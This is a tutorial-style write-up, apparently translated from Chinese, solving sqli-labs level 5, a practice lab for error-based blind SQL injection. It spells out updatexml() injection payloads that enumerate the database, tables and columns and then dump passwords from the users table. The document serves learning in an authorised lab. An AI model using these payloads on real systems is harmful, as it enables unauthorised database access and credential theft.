sqli-labs level 5 (blind error reporting based on single quotes enclosed by get submission) ideas for passing the level

Article directory

  • Preface
  • 1. Review the knowledge points from previous levels
  • 2. Knowledge you need to know about the fifth level of the shooting range
    • 1. What is a blind bet?
    • 2. How many categories are blind bets divided into?
    • 3. Related functions used for error injection
  • 3. Ideas for the fifth level of the shooting range
    • 1. Determine the injection point
    • 2. Explosive display position
    • 3. Explode the database name
    • 4. Explode database tables
    • 5. Explode database columns
    • 6. Explode key information in the database
  • Summarize

Foreword

This article is only used for learning and reflection to consolidate SQL injection knowledge, and is prohibited from being used for illegal attacks. Note that the shooting range is a platform for practice, and you cannot go to unauthorized websites for penetration testing! ! !

1. Review the knowledge points of previous levels

Through continuous practice in the first few levels, we gradually figured out the basic ideas of SQL injection when there is an echo, and became familiar with the entire process of SQL injection. The test point in the first few levels is how to determine the type of injection point, is it numeric or character? If it is a character type, how will it be closed? These are all things we have solved and thought about in the previous levels. Without further ado, let’s see what kind of sparks this level will create.

2. Knowledge you need to know about the fifth level of the shooting range

  • 1. What is a blind bet?
  • 2. How many categories are blind bets divided into?
  • 3. Related functions used for error injection

1. What is a blind bet?

SQL injection is divided into two categories, injection with echo and injection without echo.

  • 1. Echo injection: The data entered by the user will be echoed into the page. For example, the first 4 levels of the shooting range are a typical example. We can use the feature of the page to echo data to insert a joint query to echo the information we want.

  • 2. No echo injection: Obviously, it is the opposite of echo injection. The page will not echo the data entered by the user. In other words, the first few levels of methods are not suitable for This level is invalid. So this level uses blind bets.

2. How many categories are blind bets divided into?

Blind injection is generally divided into three categories, error injection, time blind injection and Boolean blind injection.

  1. Error reporting blind injection: Error reporting injection means that the user uses related functions to splice it into the database, allowing the database to force an error to return the information we want.
  2. Time blind injection: Time injection means splicing the database through functions such as sleep(), if(), and guessing database-related information through the time difference between the browser returning the page.
  3. Boolean blind injection: Boolean blind injection means guessing database-related information through related functions true and false.

3. Related functions used for error injection

The first function and the second function are in higher mysql versions (greater than version 5.1)

  1. extractvalue() This function returns a string containing the queried value from the target XML,

Syntax: extractvalue(XML_document, xpath_string)

The first parameter: string format, which is the name of the XML document object
2. updatexml() updatexml() is a function that matches and replaces xml blocks using different xml tags,

Syntax: updatexml(XML_document, XPath_string, new_value)

  1. floor() Numeric function that returns the largest integer less than or equal to the given numeric expression.

Syntax: FLOOR (numeric_expression)

  1. There are many more error reporting injections, you can read this article https://www.jianshu.com/p/bc35f8dd4f7c

3. Ideas for the fifth level of the shooting range

  • 1. Determine the injection point
  • 2. Explosive display position
  • 3. Explode the database name
  • 4. Explode database tables
  • 5. Explode database columns
  • 6. Explode key information in the database

1. Determine the injection point

(As shown in the picture) The old rule is to use and 1=1 and and 1=2 to test, and it is found that the situation with id=1 is normal, excluding numeric types. Directly submit id=1' and find that the page is abnormal. Looking at the error message, you know that it may be closed by single quotes. Try id=1' and 1=2-- + and find an error. 1=1 is normal. The description is injection enclosed in single quotes.

Someone may ask, isn’t there an error message echoed? Why do we need to use blind error injection instead of simple joint query injection? No echo means that the SQL statement we entered cannot be spliced into the database and brought back to the web page. It does not mean that the error message is echoed after closing, or the page is echoed. There are also cases where there is no response. We will talk about it later. The condition for blind error reporting is that there must be content that can echo the error report. Here, it is obvious that the error message is enclosed in single quotes.

2. Explode position

(As shown in Figure 1) The injection statement here is

id=1' order by 4-- +

, found that there are three display bits, but the next steps are different and the information cannot be echoed. If you don’t believe it, let’s try a joint query. (As shown in Figure 2)
Picture 1
Picture 2
Sure enough, I found that the page was not echoed. Just report the error honestly and practically, hahaha.

3. Explode database name

(As shown in the figure) The injection statement here is

id=1' and updatexml(1,concat(0x3a,(select database()),0x3a),1)-- +

Successfully exposed the database name

4. Explode database table

(As shown in the figure) The injection statement is

id=1' and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1)-- +

Among them, limit a, a of 1 is incremented from 0 and the query found that limit 3, 1 was found to be the table name of the suspicious database users.

Why don’t you use group_concat to query? Because the error content of the updatexml function has a length limit. If you use it, the error may be incomplete, so you use limit to query one by one

5. Exploding database columns

(As shown in the figure) The injection statement is

id=1' and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 0,1),0x3a),1)-- +

Found that limit 1,1 is username, limit 2,1 is password

6. Explode key information of database

(As shown in the figure) The injection statement is

id=1' and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)-- +

The limit is continuously incremented to obtain all passwords, and the username is also not displayed.

Summary

This level is the turning point in the shooting range, from echo injection to no echo injection. Through the sorting out of this level, I learned how to use blind bets to report errors. In fact, there are many other methods, such as the extractvalue() function. In short, you just need to know the method. This article was written by Xiaobai himself in order to consolidate SQL injection. If you are passing by, please give me some advice!